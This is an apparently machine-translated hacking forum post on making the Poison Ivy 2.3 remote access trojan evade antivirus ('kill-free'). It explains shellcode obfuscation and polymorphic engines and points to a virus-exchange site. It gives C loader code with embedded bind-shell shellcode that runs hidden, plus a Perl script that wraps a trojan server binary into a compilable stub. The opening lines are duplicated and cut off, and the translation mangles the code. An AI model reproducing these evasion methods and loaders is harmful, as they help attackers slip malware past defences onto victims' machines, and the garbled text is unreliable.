Author: mika [EST] Today, in IRC outside China, several foreigners are discussing PI2.3 kill-free, since the Alignment Method of PI2.3 is not the same as in the past, it cannot run normally after being processed by Shell programs, so it's no longer a concern. As a result, I downloaded a trial and added the shell to the test. However, due to PI2.3
Author: mika [EST] Today, in IRC outside China, several foreigners are discussing PI2.3 kill-free, since the Alignment Method of PI2.3 is not the same as in the past, it cannot run normally after being processed by Shell programs, so it's no longer a concern. As a result, I downloaded a trial and added the shell to the test. However, due to PI2.3
Author: mika [EST]
Today, in IRC outside China, we can see several foreigners discussing PI2.3's kill-free solutions. Because PI2.3's alignment method is not the same as in the past, it cannot run normally after being processed by Shell programs, therefore, the kill-free mechanism has become an object of interest to everyone. As a result, I downloaded a trial and added the shell to the test. However, since PI2.3's new features support shellcode generation, it is much easier to do! Shellcode: I understand it, and I understand it. Isn't it easy to get rid of it?
PI2.3 supports the generation of binary data, shellcode in C format, shellcode in delphi format, perl format, and python format. I am familiar with the C format, so let's discuss it.
Brother, sister, and younger siblings who have been engaged in overflow know that shellcode deformation is a very important part of writing exploit. Therefore, we apply it to kill-free, theoretically, it can be killed by file and memory (of course, the pure xor deformation is not memory, and garbage code (SPAM code) needs to be added to shellcode) ).
There are more ideas about deformation. It is estimated that this post is unclear. Interested friends can go to some of the more famous site to find the virus, I recommend a here: http://vx.netlux.org. This site has many ready-made deformation tools available for use and I have taken it for research (in viruses, such deformation is a type of polymorphic engine ).
Let me give you a general idea here. If you are using a polymorphic engine compiled by someone else for deformation and support the shellcode format output (that is, the output in the c or delphi format mentioned above ), then you can select the binary generation method when using PI 2.3.0 to generate the server. In this way, the binary code is generated, and then you can use your poly engine to deform it (this tool has tapion 1.0c, which can be found on the station I mentioned above ).
Or, you can directly perform manual deformation (wow, this is a little complicated, but I am also proposing it here as a way of thinking). Let's simply explain it, add the garbage code manually (with the concept of the icing command) and then deform (such as xor). The advantage of this method is that it is easier to modify even if it is killed, the disadvantage is that the first time is too troublesome (not recommended)
The next step is segment deformation, which means the deformation of a segment, and then re-Combine each segment (in different order, of course, the original execution can not be changed directly, therefore, you need to add code to connect these segments). The format of each segment is similar to this:
Decrpytor (solution terminal) + encrpyted code (transformed code) + link code (code connecting other segments ). This method is the most troublesome, but the deformation intensity is the highest.
It is possible that cainiao like me will be depressed, and they will not be able to live in such trouble ~~~ I am actually here, so all I can think of is to talk about the troubles I just mentioned. Now it's simple (it should be very simple, not to mention selling off the customs ).
In fact, we can do this in the simplest way. If we convert the generated shellcode into a pe file, can we simply use a shell tool to process it?
For example, if you generate the shellcode format of C, you can use the following code to generate a PE file:
CODE:
# Include
# Pragma comment (linker, "/MERGE:. rdata =. text/MERGE:. data =. text/p:. text, EWR ")
# Pragma comment (linker, "/subsystem: windows/ENTRY: MyEntry ")
# Pragma comment (linker, "/INCREMENTAL: NO ")
Int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow );
Unsigned char PIshellcode [] = "\ xD9 \ xE1 \ xD9 \ x34 \ x24 \ x58 \ x58 \ x58"
"\ X58 \ x80 \ xE8 \ xE7 \ x31 \ xC9 \ x66 \ x81 \ xE9 \ x97 \ xFE \ x80 \ x30 \ x92 \ x40 \ xE2"
"\ XFA \ x7A \ xAA \ x92 \ x92 \ x92 \ xD1 \ xDF \ xD6 \ x92 \ x75 \ xEB \ x54 \ xEB \ x77 \ xDB"
"\ X14 \ xDB \ x36 \ x3F \ xBC \ x7B \ x36 \ x88 \ xE2 \ x55 \ x4B \ x9B \ x67 \ x3F \ x59 \ x7F"
"\ X6E \ xA9 \ x1C \ xDC \ x9C \ x7E \ xEC \ x4A \ cross city \ xE1 \ x3F \ x4B \ x97 \ x5C \ xE0 \ x6C"
"\ X21 \ x84 \ xC5 \ xC1 \ xA0 \ xCD \ xA1 \ xA0 \ xBC \ xD6 \ xDE \ x92 \ x93 \ xC9 \ xC6"
"\ X1B \ x77 \ x1B \ xCF \ x92 \ xF8 \ xA2 \ xCB \ xF6 \ x19 \ x93 \ x19 \ xD2 \ x9E \ x19 \ xE2"
"\ X8E \ x3F \ x19 \ xCA \ x9A \ x79 \ x9E \ x1F \ xC5 \ xBE \ xC3 \ xC0 \ x6D \ x42 \ x1B \ x51"
"\ XCB \ x79 \ x82 \ xF8 \ x9A \ xCC \ x93 \ x7C \ xF8 \ x98 \ xCB \ x19 \ xEF \ x92 \ x12 \ x6B"
"\ X94 \ xE6 \ x76 \ xC3 \ xC1 \ x6D \ xA6 \ x1D \ x7A \ x07 \ x92 \ x92 \ x92 \ xCB \ x1B \ x96"
"\ X1C \ x79 \ xA3 \ x6D \ xF4 \ x13 \ x7E \ x02 \ x93 \ xC6 \ xFA \ x93 \ x93 \ x92 \ x92"
"\ X6D \ xC7 \ xB2 \ xC5 \ xC5 \ xC5 \ xC5 \ xD5 \ xC5 \ xD5 \ xC5 \ x6D \ xC7 \ x8E \ x1B \ x51"
"\ XA3 \ x6D \ xC5 \ xC5 \ xFA \ x90 \ x92 \ x83 \ xCE \ x1B \ x74 \ xF8 \ x82 \ xC4 \ xC1 \ x6D"
"\ XC7 \ x8A \ xC5 \ xC1 \ x6D \ xC7 \ x86 \ xC5 \ xC4 \ xC1 \ x6D \ xC7 \ x82 \ x1B \ x50 \ xF4"
"\ X13 \ x7E \ xC6 \ x92 \ x1F \ xAE \ xB6 \ xA3 \ x52 \ xF8 \ x87 \ xCB \ x61 \ x39 \ x1B \ x45"
"\ X54 \ xD6 \ xB6 \ x82 \ xD6 \ xF4 \ x55 \ xD6 \ xB6 \ xAE \ x93 \ x93 \ x1B \ xEE \ xB6 \ xDA"
"\ X1B \ xEE \ xB6 \ xDE \ x1B \ xEE \ xB6 \ xC2 \ x1F \ xD6 \ xB6 \ x82 \ xC6 \ xC2 \ xC3 \ xC3"
"\ XC3 \ xD3 \ xC3 \ xDB \ xC3 \ xC3 \ x6D \ xE7 \ x92 \ xC3 \ x6D \ xC7 \ xA2 \ x1B \ x73 \ x79"
"\ X9C \ xFA \ x6D \ x6D \ x6D \ x6D \ x6D \ xA3 \ x6D \ xC7 \ xBE \ xC5 \ x6D \ xC7 \ x9E \ x6D"
"\ XC7 \ xBA \ xC1 \ xC7 \ xC4 \ xC5 \ x19 \ xFE \ xB6 \ x8A \ x19 \ xD7 \ xAE \ x19 \ xC6 \ x97"
"\ XEA \ x93 \ x78 \ x19 \ xD8 \ x8A \ x19 \ xC8 \ xB2 \ x93 \ x79 \ x71 \ xA0 \ xDB \ x19 \ xA6"
"\ X19 \ x93 \ x7C \ xA3 \ x6D \ x6E \ xA3 \ x52 \ x3E \ xAA \ x72 \ xE6 \ x95 \ x53 \ x5D \ x9F"
"\ X93 \ x55 \ x79 \ x60 \ xA9 \ xEE \ xB6 \ x86 \ xE7 \ x73 \ x19 \ xC8 \ xB6 \ x93 \ x79 \ xF4"
"\ X19 \ x9E \ xD9 \ x19 \ xC8 \ x8E \ x93 \ x79 \ x19 \ x96 \ x19 \ x93 \ x7A \ x79 \ x90 \ xA3"
"\ X52 \ x1B \ x78 \ xCD \ xCC \ xCF \ xC9 \ x50 \ x9A \ x92 \ x65 \ x6D \ x44 \ x58 \ x4F \ x52 ";
Int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
_ Asm {
Lea eax, PIshellcode
Call eax
}
Return 1;
}
Void MyEntry (void)
{
ExitProcess (WinMain (GetModuleHandle (NULL), NULL, GetCommandLine (), SW_HIDE ));
}
The shellcode above is bound to the local port 4444. Replace it with the shellcode of your generated PI. After compilation, you can use the shelling tool to process the program (you can use all the methods you can think of without killing ).
I have considered the volume problem above, so I try to reduce the volume as much as possible (of course, I will certainly be able to reduce it again, but I can think of it)
The shellcode deformation mentioned at the beginning should be used to generate the PE file using the above program, but it does not need to be processed by tools.
To facilitate the generation of shellcode in text format from bin files and the generation of the above C code, I wrote a perl script to help you generate shellcode in perl and c formats, the Code is as follows:
CODE:
#! /Usr/bin/perl
# Written by mika [EST]
Use strict;
My $ BinName = shift | die "Usage: $0 (No. bin suffix) \ n ";
My $ bindata;
Open (BF, "<$ BinName. bin") | exit (0 );
$ Bindata = join ('', );
Close (BF );
Print "+ Length:". length ($ bindata). "bytes \ n ";
Print "+ Generating Perl shellcode file". $ BinName. ". pl ...";
My $ buffer = BufferPerl ($ bindata );
Open (PF, "> $ BinName. pl ");
Print PF "my \ $ PlShellcode =". $ buffer;
Close (PF );
Print "Done". "\ n ";
Print "+ Generating C shellcode file". $ BinName. ". cpp ...";
$ Buffer = BufferC ($ bindata );
My $ C_shellcode;
While () {$ C_shellcode. =$ _;}
$ C_shellcode = ~ S/: SHELLCODE:/$ buffer/g;
Open (CF, "> $ BinName. cpp ");
Print CF $ C_shellcode;
Close (CF );
Print "Done". "\ n ";
Sub BufferPerl
{
My ($ data, $ width) = @_;
My ($ res, $ count );
If (! $ Data) {return}
If (! $ Width) {$ width = 16}
$ Res = '"';
$ Count = 0;
Foreach my $ char (split (//, $ data ))
{
If ($ count = $ width)
{
$ Res. = '".'." \ n ".'"';
$ Count = 0;
}
$ Res. = sprintf ("\ x %. 2x", ord ($ char ));
$ Count ++;
}
If ($ count) {$ res. = '";'." \ n ";}
Return $ res;
}
Sub BufferC
{
My ($ data, $ width) = @_;
My $ res = BufferPerl ($ data, $ width );
If (! $ Res) {return}
$ Res = ~ S/\. // g;
Return $ res;
}
_ DATA __
# Include
# Pragma comment (linker, "/MERGE:. rdata =. text/MERGE:. data =. text/p:. text, EWR ")
# Pragma comment (linker, "/subsystem: windows/ENTRY: MyEntry ")
# Pragma comment (linker, "/INCREMENTAL: NO ")
Int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow );
Char PIshellCode [] =
: SHELLCODE ::
Int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
_ Asm {
Lea eax, PIshellcode
Call eax
}
Return 1;
}
Void MyEntry (void)
{
ExitProcess (WinMain (GetModuleHandle (NULL), NULL, GetCommandLine (), SW_HIDE ));
}
This program is easy to use. For example, you choose to generate the binary format when generating the PI 2.3.0 server, such as test. bin. Copy test. bin to the same directory of the perl program, and then enter:
Perl bin2shellcode. pl test
(No. bin suffix), so that the program will generate two files in the same directory, one is. the perl file with the pl suffix is the perl-format shellcode, and the other is. the C ++ file with the cpp suffix contains not only the generated shellcode but also a c ++ program that you can directly compile with VC, the generated cpp file is as follows:
CODE:
# Include
# Pragma comment (linker, "/MERGE:. rdata =. text/MERGE:. data =. text/p:. text, EWR ")
# Pragma comment (linker, "/subsystem: windows/ENTRY: MyEntry ")
# Pragma comment (linker, "/INCREMENTAL: NO ")
Int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow );
Char PIshellCode [] =
"\ X55 \ x8b \ xec \ x81 \ xc4 \ x3c \ xf2 \ xff \ x60 \ x33 \ xc0 \ x8d \ xbd \ x90 \ xf2"
"\ Xff \ xb9 \ x5b \ x0d \ x00 \ x00 \ xf3 \ xaa \ x33 \ xc0 \ x8d \ xbd \ x4c \ xf2 \ xff"
"\ Xff \ xb9 \ x44 \ x00 \ x00 \ x00 \ xf3 \ xaa \ xc7 \ x85 \ xb9 \ xf3 \ xff \ xe6 \ x00"
// ......................Omitting several shellcodes
"\ X04 \ x00 \ x74 \ x65 \ x73 \ x74 \ xf9 \ x0b \ x04 \ x00 \ x74 \ x65 \ x6d \ x86 \ x90 \ x01"
"\ X0d \ x00 \ x09 \ x31 \ x32 \ x37 \ x2e \ x30 \ x2e \ x30 \ x2e \ x31 \ x00 \ x84 \ x0d \ x8c"
"\ X01 \ x04 \ x00 \ x00 \ x00 \ x00 \ x00 \ xc1 \ x02 \ x04 \ x00 \ xff \ x45"
"\ X01 \ x05 \ x00 \ x61 \ x64 \ x6d \ x69 \ x6e \ xfb \ x03 \ x09 \ x00 \ x29 \ x21 \ x56 \ x6f"
"\ X71 \ x41 \ x2e \ x49 \ x34 \ x00 \ x00 \ x00 \ x00 ";
Int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
_ Asm {
Lea eax, PIshellcode
Call eax
}
Return 1;
}
Void MyEntry (void)
{
ExitProcess (WinMain (GetModuleHandle (NULL), NULL, GetCommandLine (), SW_HIDE ));